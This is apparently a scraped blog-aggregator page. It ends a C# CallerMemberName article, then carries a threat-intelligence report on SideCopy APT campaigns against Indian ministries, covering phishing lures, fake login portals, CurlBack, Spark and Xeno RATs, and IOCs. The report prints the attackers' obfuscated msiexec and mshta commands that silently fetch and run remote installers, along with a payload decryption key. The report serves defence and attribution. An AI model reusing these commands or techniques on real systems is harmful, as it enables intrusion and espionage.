        <>o__0.<>p__0 = CallSite<Action<CallSite, object>>.Create(Microsoft.CSharp.RuntimeBinder.Binder.InvokeMember(CSharpBinderFlags.ResultDiscarded, "SayMyName", null, typeFromHandle, array));
      }
      <>o__0.<>p__0.Target(<>o__0.<>p__0, arg);
    }
    

    I have to admit that I don’t understand why this happens: if you want, drop a comment to explain to us what is going on, I’d love to learn more about it! 📩

    Event handlers can get the method name

    Then, we have custom events.

    We define events in one place, but they are executed indirectly.

    private void CallViaEventHandler()
    {
      Console.WriteLine("Calling via events:");
      var eventSource = new MyEventClass();
      eventSource.MyEvent += (sender, e) => SayMyName();
      eventSource.TriggerEvent();
    }
    
public class MyEventClass
{
  public event EventHandler MyEvent;

  public void TriggerEvent() =>
    // Raises an event which in our case calls SayMyName via subscribing lambda method
    MyEvent?.Invoke(this, EventArgs.Empty);
}
    

    So, what will the result be? “Who” is the caller of this method?

    Calling via events:
    The method name is CallViaEventHandler!
    

    Again, it all boils down to how the method is generated at compile time: even if the actual execution is performed “asynchronously” – I know, it’s not the most obvious word for this case – at compile time the method is declared by the CallViaEventHandler method.

    CallerMemberName from the Class constructor

    Lastly, what happens when we call it from the constructor?

public CallerMemberNameTests(IOutput output) : base(output)
{
  Console.WriteLine("Calling from the constructor");
  SayMyName();
}
    

    We can consider constructors to be a special kind of method, but what’s in their names? What can we find?

    Calling from the constructor
    The method name is .ctor!
    

    Yes, the actual method name is .ctor! Regardless of the class name, the constructor is considered to be a method with that specific internal name.

    Wrapping up

    In this article, we started from a “simple” topic but learned a few things about how code is compiled and the differences between runtime and compile time.

    As always, things are not as easy as they appear!

    This article first appeared on Code4IT 🐧

    I hope you enjoyed this article! Let’s keep in touch on LinkedIn, Twitter or BlueSky! 🤜🤛

    Happy coding!

    🐧





    Source link

  • HTML Editor Online with Instant Preview and Zero Setup






    Source link

  • Write and Test Code Instantly With an Online Python Editor






    Source link

  • New TTPs and Clusters of an APT driven by Multi-Platform Attacks



    Seqrite Labs APT team has uncovered new tactics of Pakistan-linked SideCopy APT deployed since the last week of December 2024. The group has expanded its scope of targeting beyond Indian government, defence, maritime sectors, and university students to now include entities under railway, oil & gas, and external affairs ministries. One notable shift in recent campaigns is the transition from using HTML Application (HTA) files to adopting Microsoft Installer (MSI) packages as a primary staging mechanism.

    Threat actors are continuously evolving their tactics to evade detection, and this shift is driven by their persistent use of DLL side-loading and multi-platform intrusions. This evolution also incorporates techniques such as reflective loading and repurposing open-source tools such as Xeno RAT and Spark RAT, following its trend with Async RAT to extend its capabilities. Additionally, a new payload dubbed CurlBack RAT has been identified that registers the victim with the C2 server.

    Key Findings

• Usernames associated with the attacker email IDs impersonate government personnel with a cyber security background, utilizing compromised IDs.
    • A fake domain mimicking an e-governance service, with an open directory, is used to host payloads and credential phishing login pages.
    • Thirteen sub-domains and URLs host login pages for various RTS Services for multiple City Municipal Corporations (CMCs), all in the state of Maharashtra.
    • The official domain of National Hydrology Project (NHP), under the Ministry of Water Resources, has been compromised to deliver malicious payloads.
    • New tactics such as reflective loading and AES decryption of resource section via PowerShell to deploy a custom version of C#-based open-source tool XenoRAT.
• A modified variant of the Golang-based open-source tool SparkRAT, targeting Linux platforms, has been deployed via the same stager previously used for Poseidon and Ares RAT payloads.
• A new RAT dubbed CurlBack, which uses the DLL side-loading technique, has been identified. It registers the victim with the C2 server via a UUID and supports file transfer using curl.
    • Honey-trap themed campaigns were observed in January 2025 and June 2024, coinciding with the arrest of a government employee accused of leaking sensitive data to a Pakistani handler.
    • A previously compromised education portal seen in Aug 2024, became active again in February 2025 with new URLs targeting university students. These employ three different themes: “Climate Change”, “Research Work”, and “Professional” (Complete analysis can be viewed in the recording here, explaining six different clusters of SideCopy APT).
• The parent group of SideCopy, APT36, has targeted Afghanistan after a long gap, with a theme related to the Office of the Prisoners Administration (OPA) under the Islamic Emirate of Afghanistan. A recent campaign targeting Linux systems with the theme “Developing Leadership for Future Wars” involves AES/RC4-encrypted stagers to drop the MeshAgent RMM tool.

    Targeted sectors under the Indian Ministry

    • Railways
    • Oil & Gas
    • External Affairs
    • Defence

    Phishing Emails

The campaign targeting the Defence sector begins with a phishing email dated 13 January 2025, with the subject “Update schedule for NDC 65 as discussed”. The email contains a link to download a file named “NDC65-Updated-Schedule.pdf” to lure the target.

    Fig. 1 – NDC Phishing Email (1)

A second phishing email, sent on 15 January 2025 with the subject “Policy update for this course.txt”, also contains a phishing link. This email originates from an official-looking email ID which is likely compromised. The National Defence College (NDC), a defence services training institute for the strategy and practice of National Security located in Delhi, operates under the Ministry of Defence, India.

    Fig. 2 – NDC Phishing Email (2)

    The attacker’s email address “gsosystems-ndc@outlook[.]com”, was created on 10 January 2025 in UAE and was last seen active on 28 February 2025. OSINT reveals similar looking email ID “gsosystems.ndc-mod@nic[.]in” belonging to National Informatics Centre (NIC), a department under the Ministry of Electronics and Information Technology (MeitY), India. The username linked to the attacker’s email impersonates a government personnel member with cyber security background.

    Fig. 3 – Attacker Email

    Decoy Documents

    The decoy is related to the National Defence College (NDC) in India and contains the Annual Training Calendar (Study & Activities) for the year 2025 for the 65th Course (NDC-65). Located in New Delhi, it is the defence service training institute and highest seat of strategic learning for officers of the Defence Service (Indian Armed Forces) and the Civil Services, all operating under the Ministry of Defence, India.

    Fig. 4 – NDC Calendar Decoy [Defence]

    Another phishing archive file observed with name “2024-National-Holidays-RH-PER_N-1.zip”, comes in two different variants targeting either Windows or Linux systems. Once the payload is triggered, it leads to a decoy document that contains a list of holidays for the Open Line staff for the year 2024 as the name suggests. This is an official notice from Southern Railway dated 19 December 2023, specifically for the Chennai Division. Southern Railway (SR) is one of the eighteen zones of Indian Railways, a state-owned undertaking of the Ministry of Railways, India.

    Fig. 5 – Holiday List Decoy [Railways]

The third infection chain includes a document titled “Cybersecurity Guidelines” for the year 2024, which appears to be issued by Hindustan Petroleum Corporation Limited (HPCL). Headquartered in Mumbai, HPCL is a public sector undertaking in the petroleum and natural gas industry and a subsidiary of the Oil and Natural Gas Corporation (ONGC), a state-owned undertaking of the Ministry of Petroleum and Natural Gas, India.

    Fig. 6 – Cybersecurity Guidelines Decoy [Oil & Gas]

    Another document linked to the same infection is the “Pharmaceutical Product Catalogue” for 2025, issued by MAPRA. It is specifically intended for employees of the Ministry of External Affairs (MEA), in India. Mapra Laboratories Pvt. Ltd. is a pharmaceutical company with headquarters in Mumbai.

    Fig. 7 – Catalogue Decoy [External Affairs]

    OpenDir and CredPhish

    A fake domain impersonating the e-Governance portal services has been utilized to carry out the campaign targeting railway entities. This domain was created on 16 June 2023 and features an open directory hosting multiple files, identified during the investigation.

    Fig. 8 – Open directory

    A total of 13 sub-domains have been identified, which function as login portals for various systems such as:

    • Webmail
    • Safety Tank Management System
    • Payroll System
    • Set Authority

    These are likely used for credential phishing, actively impersonating multiple legitimate government portals since last year. These login pages are typically associated with RTS Services (Right to Public Services Act) and cater to various City Municipal Corporations (CMC). All these fake portals belong to cities located within the state of Maharashtra:

    • Chandrapur
    • Gadchiroli
    • Akola
    • Satara
    • Vasai Virar
    • Ballarpur
    • Mira Bhaindar
    Fig. 9 – Login portals hosted on fake domain

The following list shows the identified sub-domains and the dates they were first observed:

• gadchiroli.egovservice[.]in – first seen 2024-12-16
• pen.egovservice[.]in – first seen 2024-11-27
• cpcontacts.egovservice[.]in, cpanel.egovservice[.]in, webdisk.egovservice[.]in, cpcalendars.egovservice[.]in, webmail.egovservice[.]in – first seen 2024-01-03
• dss.egovservice[.]in, cmc.egovservice[.]in – first seen 2023-11-03
• mail.egovservice[.]in – first seen 2023-10-13
• pakola.egovservice[.]in, pakora.egovservice[.]in – first seen 2023-07-23
• egovservice[.]in – first seen 2023-06-16

    All these domains have the following DNS history primarily registered under AS 140641 (YOTTA NETWORK SERVICES PRIVATE LIMITED). This indicates a possible coordinated infrastructure set up to impersonate legitimate services and collect credentials from unsuspecting users.

    Fig. 10 – DNS history

    Further investigation into the open directory revealed additional URLs associated with the fake domain. These URLs likely serve similar phishing purposes and host further decoy content.

    hxxps://egovservice.in/vvcmcrts/
    hxxps://egovservice.in/vvcmc_safety_tank/
    hxxps://egovservice.in/testformonline/test_form
    hxxps://egovservice.in/payroll_vvcmc/
    hxxps://egovservice.in/pakora/egovservice.in/
    hxxps://egovservice.in/dssrts/
    hxxps://egovservice.in/cmc/
    hxxps://egovservice.in/vvcmcrtsballarpur72/
    hxxps://egovservice.in/dss/
    hxxps://egovservice.in/130521/set_authority/
    hxxps://egovservice.in/130521/13/

    Cluster-A

    The first cluster of SideCopy’s operations shows a sophisticated approach by simultaneously targeting both Windows and Linux environments. New remote access trojans (RATs) have been added to their arsenal, enhancing their capability to compromise diverse systems effectively.

    Fig. 11 – Cluster A

    Windows

    A spear-phishing email link downloads an archive file containing a double-extension (.pdf.lnk) shortcut. The archives are hosted on domains that appear legitimate:

    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/

    The shortcut triggers cmd.exe with arguments that use the caret escape character (^) to evade detection and reduce readability. A new machine ID, “dv-kevin”, is seen with these files, whereas a “desktop-” prefix is usually observed in its place.

    Fig. 12 – Shortcuts with double extension

    The msiexec.exe utility is used to install MSI packages hosted remotely, combining the quiet-mode flag (/q) with the installation switch (/i):

    C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^e^g^o^v^s^e^r^v^i^c^e^.^i^n^/^d^s^s^r^t^s^/^h^e^l^p^e^r^s^/^f^o^n^t^s^/^2^0^2^4^-^N^a^t^i^o^nal-^H^o^l^i^d^a^y^s^-^R^H^-^P^E^R^_^N-^1^/^i^n^s^t^/
    C:\Windows\System32\cmd.exe /c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/^n^h^p^.^m^o^w^r^.^g^o^v^.^i^n^/^N^H^P^M^I^S^/^T^r^a^i^n^i^n^g^M^a^t^e^r^i^a^l^/^a^s^p^x^/^S^e^c^u^r^i^t^y^-^G^u^i^d^e^l^i^n^e^s^/^w^o^n^t^/
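
    The caret (^) is the cmd.exe escape character and is simply ignored by the shell, so the original command can be recovered by stripping it out. Below is a minimal Python sketch of this de-obfuscation; the sample string is shortened and illustrative, not one of the observed commands.

    # cmd.exe treats ^ as an escape character and ignores it outside quotes,
    # so removing carets restores the obfuscated command line.
    def deobfuscate_cmd(command_line: str) -> str:
        return command_line.replace("^", "")

    if __name__ == "__main__":
        sample = r"/c m^s^i^e^x^e^c.exe /q /i h^t^t^p^s^:^/^/example.invalid/inst/"
        print(deobfuscate_cmd(sample))
        # -> /c msiexec.exe /q /i https://example.invalid/inst/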

    The first domain mimics the fake e-governance site seen with the open directory, while the second is a compromised domain belonging to the official National Hydrology Project, an entity under the Ministry of Water Resources. The MSI contains a .NET executable, ConsoleApp1.exe, which drops multiple Base64-encoded PE files. First, the decoy document is dropped in the Public directory and opened, while the remaining PE files are dropped in ‘C:\ProgramData\LavaSoft\’. Among them are two DLLs:

    • Legitimate DLL: Sampeose.dll
    • Malicious DLL: DUI70.dll, identified as CurlBack RAT.

    Fig. 13 – Dropper within MSI package

    CurlBack RAT

    A signed Windows binary, girbesre.exe (original name CameraSettingsUIHost.exe), is dropped beside the DLLs. Upon execution, the EXE side-loads the malicious DLL. Persistence is achieved by dropping an HTA script (svnides.hta) that creates a Run registry key for the EXE. Two different malicious DLL samples were found, with compilation timestamps of 2024-12-24 and 2024-12-30.

    Fig. 14 – Checking response ‘/antivmcommand’

    CurlBack RAT first checks the response of a specific URL using the ‘/antivmcommand’ endpoint. If the response is “on”, it proceeds; otherwise it terminates itself, effectively giving the operators a kill switch. It then gathers system information and enumerates any connected USB devices using the registry key:

    • “SYSTEM\\ControlSet001\\Enum\\USBSTOR”
    Fig. 15 – Retrieving system info and USB devices
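
    For reference, the same registry location can be read with a few lines of Python on Windows. A minimal, read-only analyst-side sketch that lists the USB storage device entries recorded under USBSTOR, using the standard-library winreg module:

    # List USB storage device entries from the registry key queried by CurlBack RAT.
    # Windows-only; winreg ships with the Python standard library.
    import winreg

    USBSTOR = r"SYSTEM\ControlSet001\Enum\USBSTOR"

    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, USBSTOR) as key:
        subkey_count = winreg.QueryInfoKey(key)[0]
        for i in range(subkey_count):
            # Each subkey describes a device, e.g. "Disk&Ven_...&Prod_..."
            print(winreg.EnumKey(key, i))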

    Connected displays and running processes are enumerated, checking for explorer, msedge, chrome, notepad, taskmgr, services, defender, and settings.

    Fig. 16 – Enumerate displays and processes

    Next, it generates a UUID for client registration with the C2 server. The generated ID is written to “C:\Users\<username>\.client_id.txt” along with the username.

    Fig. 17 – Client ID generated for C2 registration

    Before registering with this ID, persistence is set up via a scheduled task named “OneDrive” for the legitimate binary, which can be observed at “C:\Windows\System32\Tasks\OneDrive”.

    Fig. 18 – Scheduled Task

    Reversed strings appended to the C2 domain and their purpose:

    String Functionality
    /retsiger/ Register client with the C2
    /sdnammoc/ Fetch commands from C2
    /taebtraeh/ Check connection with C2 regularly
    /stluser/ Upload results to the C2
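
    Decoding these endpoints is simply a matter of reversing the strings. A small Python sketch that recovers the plain-text C2 paths from the table above:

    # CurlBack RAT stores its C2 URL paths reversed; reversing them back
    # reveals the actual API endpoints.
    reversed_paths = ["/retsiger/", "/sdnammoc/", "/taebtraeh/", "/stluser/"]

    for path in reversed_paths:
        print(f"{path} -> {path[::-1]}")
    # /retsiger/ -> /register/
    # /sdnammoc/ -> /commands/
    # /taebtraeh/ -> /heartbeat/
    # /stluser/ -> /results/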

    Once registered, the connection is kept alive to retrieve any commands that are returned in the response.

    Fig. 19 – Commands response after registration

    If the response contains any value, it retrieves the current timestamp and executes one of the following C2 commands:

    Command Functionality
    info Gather system information
    download Download files from the host
    persistence Modify persistence settings
    run Execute arbitrary commands
    extract Extract data from the system
    permission Check and elevate privileges
    users Enumerate user accounts
    cmd Execute command-line operations

    Fig. 20 – Checking process privilege with ‘permission’ command

    Other basic functions include fetching user and host details, extracting archive files, and creating tasks. Strings and code show that cURL functionality embedded in the malicious DLL is used to enumerate and transfer various file formats:

    • Image files: GIF, JPEG, JPG, SVG
    • Text files: TXT, HTML, PDF, XML

    Fig. 21 – CURL protocols supported

    Linux

    In addition to its Windows-focused attacks, the first cluster of SideCopy also targets Linux environments. The malicious archive file shares the same name as its Windows counterpart, but with a modification date of 2024-12-20. The archive contains a Go-based ELF binary, reflecting a consistent cross-platform strategy. Upon analysis, the function flow of the stager shows code similarity with the stagers associated with Poseidon and Ares RAT, which are linked to the Transparent Tribe and SideCopy APTs respectively.

    Fig. 22 – Golang Stager for Linux

    Stager functionality:

    1. Uses the wget command to download a decoy from the egovservice domain into the target directory /.local/share and open it (National-Holidays-RH-PER_N-1.pdf).
    2. Downloads the final ELF payload as /.local/share/xdg-open and executes it.
    3. Creates a crontab ‘/dev/shm/mycron’ to maintain persistence for the payload across system reboots, under the current username (a quick check for these artifacts is sketched below).
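
    Based on the paths listed above, defenders can quickly sweep a Linux host for these artifacts. A minimal Python sketch follows; the file names are taken from this campaign, and the assumption that the drop directory sits under the current user’s home may not hold in other intrusions.

    # Check for file-system artifacts left by the Go-based stager described above.
    # Paths are specific to this campaign and may differ elsewhere.
    import os

    home = os.path.expanduser("~")
    indicators = [
        os.path.join(home, ".local/share/xdg-open"),                          # dropped ELF payload
        os.path.join(home, ".local/share/National-Holidays-RH-PER_N-1.pdf"),  # decoy PDF (assumed location)
        "/dev/shm/mycron",                                                     # crontab file used for persistence
    ]

    for path in indicators:
        status = "FOUND" if os.path.exists(path) else "not found"
        print(f"{status}: {path}")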

    The final payload delivered by the stager is Spark RAT, an open-source remote access trojan with cross-platform support for Windows, macOS, and Linux systems. Written in Golang and released on GitHub in 2022, the RAT is very popular with over 500 forks. Spark RAT uses WebSocket protocol and HTTP requests to communicate with the C2 server.

    Fig. 23 – Custom Spark RAT ‘thunder’ connecting to C2

    Features of Spark RAT include process management and termination, network traffic monitoring, file exploration and transfer, file editing and deletion, code highlighting, desktop monitoring, screenshot capture, OS information retrieval, and remote terminal access. Additionally, it supports power management functions such as shutdown, reboot, log-off, sleep, hibernate, and lock screen.

    Cluster-B

    The second cluster of SideCopy’s activity targets Windows systems, although we suspect it also targets Linux systems, based on infrastructure observed since 2023.

    Fig. 24 – Cluster B

    The infection starts with a spear-phishing email link that downloads an archive file named ‘NDC65-Updated-Schedule.zip’. The archive contains a shortcut file in double-extension format, which triggers a remote HTA file hosted on another compromised domain:

    • “hxxps://modspaceinterior.com/wp-content/upgrade/01/ & mshta.exe”

    Fig. 25 – Archive with malicious LNK

    The machine ID associated with the LNK, “desktop-ey8nc5b”, has been observed in previous SideCopy campaigns, although the modification date ‘2023:05:26’ suggests it may be an older artifact being reused. In parallel to the MSI stagers, the group continues to utilize HTA-based stagers, which remain almost fully undetected (FUD).

    Fig. 26 – Almost FUD stager of HTA

    The HTA file contains a Base64-encoded .NET payload, BroaderAspect.dll, which is decoded and loaded directly into the memory of MSHTA. This binary opens the dropped NDC decoy document in the ProgramData directory and drops an additional .NET stager, disguised as a PDF, in the Public directory. Persistence is set via a Run registry key named “Edgre”, which executes:

    • cmd /C start C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf

    Encrypted Payload

    The dropped .NET binary (PDB name ‘Myapp.pdb’) has two resource files:

    • “Myapp.Resources.Document.pdf”
    • “Myapp.Properties.Resources.resources”

    The first resource is decoded using a Caesar cipher with a backward shift of 9. It is dropped as ‘Public\Downloads\Document.pdf’ (122.98 KB), a 2004 GIAC paper on “Advanced communication techniques of remote access trojan horses on windows operating systems”.

    Fig. 27 – Document with appended payload

    Although this document is not used as a decoy, an encrypted payload is appended at the end of the file. The malware searches for the “%%EOF” marker to separate the PDF data from the EXE data: the PDF data is extracted from the start of the file up to the marker, while the EXE data is extracted after skipping 6 bytes beyond the marker.

    Fig. 28 – Extracting EXE after EOF marker
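
    Both extraction steps can be reproduced in a few lines. The sketch below assumes a byte-wise backward shift of 9 (mod 256) for the Caesar decoding and a split at the first “%%EOF” occurrence; these are inferences from the behaviour described above, not a byte-exact reimplementation of the dropper.

    # Sketch of the resource decoding and PDF/EXE split described above.
    def caesar_decode(data: bytes, shift: int = 9) -> bytes:
        # Shift every byte backward by 'shift' (assumed modulo 256).
        return bytes((b - shift) % 256 for b in data)

    def split_pdf_and_exe(decoded: bytes) -> tuple[bytes, bytes]:
        marker = decoded.find(b"%%EOF")
        if marker == -1:
            raise ValueError("%%EOF marker not found")
        end = marker + len(b"%%EOF")
        pdf_data = decoded[:end]        # PDF content up to (and including) the marker
        exe_data = decoded[end + 6:]    # skip 6 bytes beyond the marker; the rest is the EXE
        return pdf_data, exe_data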

    After a short delay, the EXE data is dropped as “Public\Downloads\suport.exe” (49.53 KB), which is passed as an argument, along with a key, to a PowerShell command.

    Fig. 29 – Extracting resource and triggering PowerShell

    PowerShell Stage

    PowerShell is executed with the basic arguments “-NoProfile -ExecutionPolicy Bypass -Command” to ignore execution policies and the user profile. Two parameters are passed:

    • -EPath 'C:\\Users\\Public\\Downloads\\suport.exe'
    • -EKey 'wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0='

    After a short delay, the encryption key is decoded from Base64 and its first 16 bytes are used as the IV for AES decryption (CBC mode with PKCS7 padding). The decrypted binary is then loaded as a .NET assembly directly into memory and its entry point is invoked.

    Fig. 30 – PowerShell decryption
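
    For analysis, the decryption step can be reproduced with a short script. The sketch below assumes the full 32-byte Base64-decoded value is the AES-256 key and that its first 16 bytes are reused as the IV, as the described PowerShell suggests; it relies on the third-party pycryptodome package and should only be run against the sample in an isolated environment.

    # Sketch of the AES-CBC/PKCS7 decryption performed by the PowerShell stage (see assumptions above).
    import base64
    from Crypto.Cipher import AES            # pip install pycryptodome
    from Crypto.Util.Padding import unpad

    def decrypt_payload(enc_path: str, b64_key: str) -> bytes:
        key = base64.b64decode(b64_key)       # 32 bytes for the observed -EKey value
        iv = key[:16]                         # first 16 bytes reused as the IV (assumption)
        with open(enc_path, "rb") as f:
            ciphertext = f.read()
        cipher = AES.new(key, AES.MODE_CBC, iv)
        return unpad(cipher.decrypt(ciphertext), AES.block_size)

    # Example with the values from this sample (analysis environment only):
    # decrypted = decrypt_payload(r"C:\Users\Public\Downloads\suport.exe",
    #                             "wq6AHvkMcSKA++1CPE3yVwg2CpdQhEzGbdarOwOrXe0=")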

    Custom Xeno RAT

    Dumping the final .NET payload, named ‘DevApp.exe’, reveals familiar functions seen in Xeno RAT, an open-source remote access trojan first seen at the end of 2023. Key features include HVNC, live microphone access, SOCKS5 reverse proxy, UAC bypass, keylogging, and more. The custom variant used by SideCopy adds basic string-manipulation methods and uses 79.141.161[.]58:1256 as its C2 address and port.

    Fig. 31 – Custom Xeno RAT

    Last year, a custom Xeno RAT variant named MoonPeak was used by a North Korean-linked APT tracked as UAT-5394. Similarly, custom Spark RAT variants have been adopted by Chinese-speaking actors such as DragonSpark and TAG-100.

    Infrastructure and Attribution

    The following domains were used by the threat group for malware staging. Most of them have GoDaddy.com, LLC as their registrar.

    Staging Domain First Seen Created ASN
    modspaceinterior[.]com Jan 2025 Sept 2024 AS 46606 – GoDaddy
    drjagrutichavan[.]com Jan 2025 Oct 2021 AS 394695 – GoDaddy
    nhp.mowr[.]gov[.]in Dec 2024 Feb 2005 AS 4758 – National Informatics Centre
    egovservice[.]in Dec 2024 June 2023 AS 140641 – GoDaddy
    pmshriggssssiwan[.]in Nov 2024 Mar 2024 AS 47583 – Hostinger
    educationportals[.]in Aug 2024 Aug 2024 AS 22612 – NameCheap

    The C2 domains were created just before the campaign, in the last week of December 2024. Registered with the Canadian registrar “Internet Domain Service BS Corp.”, they resolve to IPs under Cloudflare ASN 13335, located in California.

    C2 Domain                            Created       IP                                  ASN
    updates.widgetservicecenter[.]com    2024-Dec-25   104.21.15[.]163, 172.67.163[.]31    AS 13335 – Cloudflare
    updates.biossysinternal[.]com        2024-Dec-23   172.67.167[.]230, 104.21.13[.]17    AS 202015 – HZ Hosting Ltd.

    The Xeno RAT C2, 79.141.161[.]58, has a unique common name (CN=PACKERP-63KUN8U) and is hosted by HZ Hosting Limited under ASN 202015. The port used for communication is 1256, but an open RDP port (56777) is also observed.

    Fig. 32 – Diamond Model

    Both C2 domains are associated with Cloudflare ASN 13335, resolved to IP range 172.67.xx.xx. Similar C2 domains on this ASN have previously been leveraged by SideCopy in attacks targeting the maritime sector. Considering the past infection clusters, observed TTPs and hosted open directories, these campaigns with new TTPs are attributed to SideCopy with high confidence.

    Conclusion

    Pakistan-linked SideCopy APT group has significantly evolved its tactics since late December 2024, expanding its targets to include critical sectors such as railways, oil & gas, and external affairs ministries. The group has shifted from using HTA files to MSI packages as a primary staging mechanism and continues to employ advanced techniques like DLL side-loading, reflective loading, and AES decryption via PowerShell. Additionally, they are leveraging customized open-source tools like Xeno RAT and Spark RAT, along with deploying the newly identified CurlBack RAT. Compromised domains and fake sites are being utilized for credential phishing and payload hosting, highlighting the group’s ongoing efforts to enhance persistence and evade detection.

    SEQRITE Protection

    • LNK.SideCopy.49245.Gen
    • LNK.Trojan.49363.GC
    • SideCopy.Mal.49246.GC
    • HTA.SideCopy.49248.Gen
    • HTA.SideCopy.49247.Gen
    • HTA.Trojan.49362.GC
    • Trojan.Fmq

    IOCs

    Windows

    a5410b76d0cb36786e00d2968d3ab6e4 2024-National-Holidays-RH-PER_N-1.zip
    f404496abccfa93eed5dfda9d8a53dc6 2024-National-Holidays-RH-PER_N-1.pdf.lnk
    0e57890a3ba16b1ac0117a624f262e61 Security-Guidelines.zip
    57c2f8b4bbf4037439317a44c2263346 Security-Guidelines.pdf.lnk
    53eebedc3846b7cf5e29a90a5b96c803 wininstaller.msi
    97c3328427b72f05f120e9a98b6f9b09 installerr.msi
    0690116134586d41a23baed300fc6355 ConsoleApp1.exe
    ef40f484e095f0f6f207139cb870a16e ConsoleApp1.exe
    9d189e06d3c4cefdd226e645a0b8bdb9 DUI70.dll
    589a65e0f3fe6777d17d0ac36ab07f6f DUI70.dll
    0eb9e8bec7cc70d603d2d8b6efdd6bb5 update schedule for ndc 65 as discussed.txt
    8ceeeec0e33026114f028cbb006cb7fc policy update for this course.txt
    1d65fa0457a9917809660fff782689fe NDC65-Updated-Schedule.zip
    7637cbfa99110fe8e1074e7ead66710e NDC65-Updated-Schedule.pdf.lnk
    32a44a8f7b722b078b647e82cb9e85cf NDC65-Updated-Schedule.hta
    a2dc9654b99f656b4ab30cf5d97fe2e1 BroaderAspect.dll
    b45aa156aef2ad2c77b7c623a222f453 zuidrt.pdf
    83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf
    cf6681cf1f765edb6cae81eeed389f78 suport.exe
    c952aca2036d6646c0cffde9e6f22775 DevApp.exe (Custom Xeno RAT)

    Linux

    b5e71ff3932c5ef6319b7ca70f7ba8da 2024-National-Holidays-RH-PER_N-1.zip
    0a67bfda993152c93a212087677f9b60 2024-National-Holidays-RH-PER_N-1․pdf
    e165114280204c39e99cf0c650477bf8 clinsixfer.elf (Custom Spark RAT)

    C2

    79.141.161[.]58:1256                 Xeno RAT
    updates.widgetservicecenter[.]com    CurlBack RAT
    updates.biossysinternal[.]com        CurlBack RAT

    URLs

    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/
    hxxps://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/inst/
    hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/clinsixfer.elf
    hxxp://egovservice.in/dssrts/helpers/fonts/2024-National-Holidays-RH-PER_N-1/lns/2024-National-Holidays-RH-PER_N-1.pdf
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/
    hxxps://nhp.mowr.gov.in/NHPMIS/TrainingMaterial/aspx/Security-Guidelines/wont/
    hxxps://updates.widgetservicecenter.com/antivmcommand
    hxxps://modspaceinterior.com/wp-content/upgrade/02/NDC65-Updated-Schedule.zip
    hxxps://modspaceinterior.com/wp-content/upgrade/01/
    hxxps://modspaceinterior.com/wp-content/upgrade/01/NDC65-Updated-Schedule.hta
    hxxps://egovservice.in/vvcmcrts/
    hxxps://egovservice.in/vvcmc_safety_tank/
    hxxps://egovservice.in/testformonline/test_form
    hxxps://egovservice.in/payroll_vvcmc/
    hxxps://egovservice.in/pakora/egovservice.in/
    hxxps://egovservice.in/dssrts/
    hxxps://egovservice.in/cmc/
    hxxps://egovservice.in/vvcmcrtsballarpur72/
    hxxps://egovservice.in/dss/
    hxxps://egovservice.in/130521/set_authority/
    hxxps://egovservice.in/130521/13/

    Staging domains

    modspaceinterior[.]com
    drjagrutichavan[.]com
    nhp.mowr[.]gov[.]in
    pmshriggssssiwan[.]in
    educationportals[.]in
    egovservice[.]in
    gadchiroli.egovservice[.]in
    pen.egovservice[.]in
    cpcontacts.egovservice[.]in
    cpanel.egovservice[.]in
    webdisk.egovservice[.]in
    cpcalendars.egovservice[.]in
    webmail.egovservice[.]in
    www.dss.egovservice[.]in
    www.cmc.egovservice[.]in
    cmc.egovservice[.]in
    dss.egovservice[.]in
    mail.egovservice[.]in
    www.egovservice[.]in
    www.pakola.egovservice[.]in
    pakola.egovservice[.]in
    www.pakora.egovservice[.]in
    pakora.egovservice[.]in

    Host and PDB

    C:\ProgramData\LavaSoft\Sampeose.dll
    C:\ProgramData\LavaSoft\DUI70.dll
    C:\ProgramData\LavaSoft\girbesre.exe
    C:\ProgramData\LavaSoft\svnides.hta
    C:\Users\Public\USOShared-1de48789-1285\zuidrt.pdf
    C:\Users\Public\Downloads\Document.pdf
    C:\Users\Public\Downloads\suport.exe
    E:\finalRnd\Myapp\obj\Debug\Myapp.pdb

    Decoys

    320bc4426f4f152d009b6379b5257c78 2024-National-Holidays-RH-PER_N-1.pdf
    9de50f9357187b623b06fc051e3cac4f Security-Guidelines.pdf
    c9c98cf1624ec4717916414922f196be NDC65-Updated-Schedule.pdf
    83ce6ee6ad09a466eb96f347a8b0dc20 Document.pdf

    MITRE ATT&CK

    TTP Name
    Reconnaissance
    T1589.002 Gather Victim Identity Information: Email Addresses
    Resource Development
    T1583.001 Acquire Infrastructure: Domains
    T1584.001 Compromise Infrastructure: Domains
    T1587.001 Develop Capabilities: Malware
    T1588.001 Obtain Capabilities: Malware
    T1588.002 Obtain Capabilities: Tool
    T1608.001 Stage Capabilities: Upload Malware
    T1608.005 Stage Capabilities: Link Target
    T1585.002 Establish Accounts: Email Accounts
    T1586.002 Compromise Accounts: Email Accounts
    Initial Access
    T1566.002 Phishing: Spearphishing Link
    Execution
    T1106 Native API
    T1129 Shared Modules
    T1059 Command and Scripting Interpreter
    T1047 Windows Management Instrumentation
    T1204.001 User Execution: Malicious Link
    T1204.002 User Execution: Malicious File
    Persistence
    T1053.003 Scheduled Task/Job: Cron
    T1547.001 Registry Run Keys / Startup Folder
    Privilege Escalation
    T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control
    Defense Evasion
    T1036.005 Masquerading: Match Legitimate Name or Location
    T1036.007 Masquerading: Double File Extension
    T1140 Deobfuscate/Decode Files or Information
    T1218.005 System Binary Proxy Execution: Mshta
    T1574.002 Hijack Execution Flow: DLL Side-Loading
    T1027 Obfuscated Files or Information
    T1620 Reflective Code Loading
    Discovery
    T1012 Query Registry
    T1016 System Network Configuration Discovery
    T1033 System Owner/User Discovery
    T1057 Process Discovery
    T1082 System Information Discovery
    T1083 File and Directory Discovery
    T1518.001 Software Discovery: Security Software Discovery
    Collection
    T1005 Data from Local System
    T1056.001 Input Capture: Keylogging
    T1123 Audio Capture
